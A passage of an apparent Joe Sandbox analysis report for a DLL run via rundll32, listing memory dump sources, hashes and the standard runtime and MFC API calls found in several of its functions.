                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 1007970657-0
                                                                                                          • Opcode ID: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
                                                                                                          • Instruction ID: 44eb2ef316f0b933980e992ec3fa30d6a4f6e9fba2b57c8abd37e2d05c6bd9c1
                                                                                                          • Opcode Fuzzy Hash: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
                                                                                                          • Instruction Fuzzy Hash: 4A31EA75A00119DFDB24CFA8C985FAEBBB5FB48300F108299E549E7241DA30AE84DF54
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • _strcpy_s.LIBCMT ref: 100212CD
                                                                                                            • Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                            • Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88
                                                                                                            • Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24
                                                                                                          • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
                                                                                                          • __snwprintf_s.LIBCMT ref: 1002131A
                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 10021355
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
                                                                                                          • String ID: LOC
                                                                                                          • API String ID: 1016519223-519433814
                                                                                                          • Opcode ID: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
                                                                                                          • Instruction ID: e5882df6752d869781cd97db702e75e799ef83d3d4dcb43d327d0f518dc3dfd8
                                                                                                          • Opcode Fuzzy Hash: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
                                                                                                          • Instruction Fuzzy Hash: A021063990121CAFDB11EBA0EC46BDD33EEEB05751F9004A1FA04DB491DB70AE45C6A0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 10031D3A
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10031D4F
                                                                                                          • UnhandledExceptionFilter.KERNEL32(10049478), ref: 10031D5A
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 10031D76
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 10031D7D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 2579439406-0
                                                                                                          • Opcode ID: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
                                                                                                          • Instruction ID: eb2889493d924e234dee94db6a5018ee6042f58a5b7914c10149dcbc3be7d463
                                                                                                          • Opcode Fuzzy Hash: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
                                                                                                          • Instruction Fuzzy Hash: C8219AB8C01A24DFF742DF68DDC96883BB4FB1C345F52102AE9088B665E7B06985CF15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$LongMessageSendWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1063413437-0
                                                                                                          • Opcode ID: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
                                                                                                          • Instruction ID: a80f2be592eaa4d0f51a0e10a6f75c43a55355dd3138243e3a8160c71d5bf3bd
                                                                                                          • Opcode Fuzzy Hash: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
                                                                                                          • Instruction Fuzzy Hash: 0AF0E93A7C035B66EA10E6707C81F950814FF45BD4FC11431BF49EA1D2DFA0C89119B0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Version_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 963298953-0
                                                                                                          • Opcode ID: 261500b53b9fbffb2ab7006eb20860b792d5709bcfa83feeb3a436b21e339e9d
                                                                                                          • Instruction ID: 60a6db508766d0176de5257cd9c04f851b8e12d18597fbeb5363c1cc45f9d795
                                                                                                          • Opcode Fuzzy Hash: 261500b53b9fbffb2ab7006eb20860b792d5709bcfa83feeb3a436b21e339e9d
                                                                                                          • Instruction Fuzzy Hash: 54F065799002189FEB50DB74DD46B8E77F8AB04304F9144E5950DD3282EA70AA48CB41
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10028DF6
                                                                                                            • Part of subcall function 1002B0BB: __EH_prolog3.LIBCMT ref: 1002B0C2
                                                                                                          • CallNextHookEx.USER32 ref: 10028E3A
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          • GetClassLongA.USER32 ref: 10028E7E
                                                                                                          • GlobalGetAtomNameA.KERNEL32 ref: 10028EA8
                                                                                                          • SetWindowLongA.USER32 ref: 10028EFD
                                                                                                          • _memset.LIBCMT ref: 10028F47
                                                                                                          • GetClassLongA.USER32 ref: 10028F77
                                                                                                          • GetClassNameA.USER32(?,?,00000100), ref: 10028F98
                                                                                                          • GetWindowLongA.USER32 ref: 10028FBC
                                                                                                          • GetPropA.USER32 ref: 10028FD6
                                                                                                          • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 10028FE1
                                                                                                          • GetPropA.USER32 ref: 10028FE9
                                                                                                          • GlobalAddAtomA.KERNEL32 ref: 10028FF1
                                                                                                          • SetWindowLongA.USER32 ref: 10028FFF
                                                                                                          • CallNextHookEx.USER32 ref: 10029017
                                                                                                          • UnhookWindowsHookEx.USER32(?), ref: 1002902B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                          • String ID: #32768$AfxOldWndProc423$ime
                                                                                                          • API String ID: 867647115-4034971020
                                                                                                          • Opcode ID: 028737d45415cf4fc653e4401d117fb93ecf855678ad16e5d4e8c367e2bfe641
                                                                                                          • Instruction ID: c9f41a1409c6bb8d0fa3b18bb25e3997143979ac063bd30542687b89172f9a1c
                                                                                                          • Opcode Fuzzy Hash: 028737d45415cf4fc653e4401d117fb93ecf855678ad16e5d4e8c367e2bfe641
                                                                                                          • Instruction Fuzzy Hash: 2361027590122AAFDB11DF61DD88B9E7BB8FF093A1F920154F509E6191DB30DE80CBA4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 100214D5
                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                                                                                                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                                                                                                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
                                                                                                          • EnumResourceLanguagesA.KERNEL32 ref: 100215EA
                                                                                                          • ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
                                                                                                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
                                                                                                          • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                                                                                                          • _memset.LIBCMT ref: 10021689
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                                                                                                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                          • API String ID: 3537336938-2299501126
                                                                                                          • Opcode ID: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
                                                                                                          • Instruction ID: 3754a4cc769aa270db1ce7901eb040107ed5b3d0b04ae9dca27c5b132e5f9257
                                                                                                          • Opcode Fuzzy Hash: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
                                                                                                          • Instruction Fuzzy Hash: 77515974C002289BCB61DF659C44BEDBAF4EB59300F5002EAE988E3291DB749E81CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,745F5D80,100250B0,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024F86
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FA2
                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FB3
                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FC4
                                                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FD5
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FE6
                                                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024FF7
                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10025008
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                          • API String ID: 667068680-68207542
                                                                                                          • Opcode ID: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
                                                                                                          • Instruction ID: f18cf552d00ebf4573e19fd52f8b2344fe61d2491b1b7e62cf44cba2888c0d7d
                                                                                                          • Opcode Fuzzy Hash: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
                                                                                                          • Instruction Fuzzy Hash: 15213672D10170ABE752EF749DC886D7AF8F64C2827A1083FE302DA12AD7724540DF98
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                          • String ID: (
                                                                                                          • API String ID: 808654186-3887548279
                                                                                                          • Opcode ID: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
                                                                                                          • Instruction ID: 79398ab63d643b80669917eeb3518c0a7ae9ea55fdc53564aac6bb8538d6af80
                                                                                                          • Opcode Fuzzy Hash: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
                                                                                                          • Instruction Fuzzy Hash: 08513C72900219AFDB01CBA8EE85AEEBBB9FF48350F554125F909F3251DB30ED458B64
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
                                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 1003462D
                                                                                                            • Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
                                                                                                            • Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671
                                                                                                          • GetProcAddress.KERNEL32(00000000,EncodePointer,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000), ref: 10034656
                                                                                                          • GetProcAddress.KERNEL32(00000000,DecodePointer,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880,00000000,00000000), ref: 10034666
                                                                                                          • __lock.LIBCMT ref: 10034688
                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 10034695
                                                                                                          • __lock.LIBCMT ref: 100346A9
                                                                                                          • ___addlocaleref.LIBCMT ref: 100346C7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                          • API String ID: 1028249917-2843748187
                                                                                                          • Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                                                                                                          • Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
                                                                                                          • Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                                                                                                          • Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32), ref: 10020C68
                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10020C85
                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10020C92
                                                                                                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10020C9F
                                                                                                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10020CAC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                          • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                          • API String ID: 667068680-3617302793
                                                                                                          • Opcode ID: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                                                                                                          • Instruction ID: 164c5ab3b4a161f1fd64f3c59e5fc8043f34cbc47aed943c162e41eaa6e30758
                                                                                                          • Opcode Fuzzy Hash: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                                                                                                          • Instruction Fuzzy Hash: 621130F1C002A19BDB11DF99ADC484ABFE9F656240363427FF218D3221EB708854CE17
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043A6C
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 10043A76
                                                                                                          • int.LIBCPMT ref: 10043A8D
                                                                                                            • Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6
                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 10043A96
                                                                                                          • ctype.LIBCPMT ref: 10043AB0
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043AC4
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043AD2
                                                                                                          • std::locale::facet::_Incref.LIBCPMT ref: 10043AE2
                                                                                                          • std::locale::facet::facet_Register.LIBCPMT ref: 10043AE8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                          • String ID: bad cast
                                                                                                          • API String ID: 2535038987-3145022300
                                                                                                          • Opcode ID: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
                                                                                                          • Instruction ID: 41e516e335ea381e6c6cf3992b6e31462ccd823a1db2d0b16548d00875c41f3f
                                                                                                          • Opcode Fuzzy Hash: 3269a5203a73611e901993287b551c215e6cb5b556df1f504442498d94acef6b
                                                                                                          • Instruction Fuzzy Hash: 7E01C039D401699BCB02DBA4DC42AEE7375FF84760F724129F110EB1D1DF74AA008799
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10043C8B
                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 10043C95
                                                                                                          • int.LIBCPMT ref: 10043CAC
                                                                                                            • Part of subcall function 100427A3: std::_Lockit::_Lockit.LIBCPMT ref: 100427B6
                                                                                                          • std::locale::_Getfacet.LIBCPMT ref: 10043CB5
                                                                                                          • codecvt.LIBCPMT ref: 10043CCF
                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 10043CE3
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10043CF1
                                                                                                          • std::locale::facet::_Incref.LIBCPMT ref: 10043D01
                                                                                                          • std::locale::facet::facet_Register.LIBCPMT ref: 10043D07
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                          • String ID: bad cast
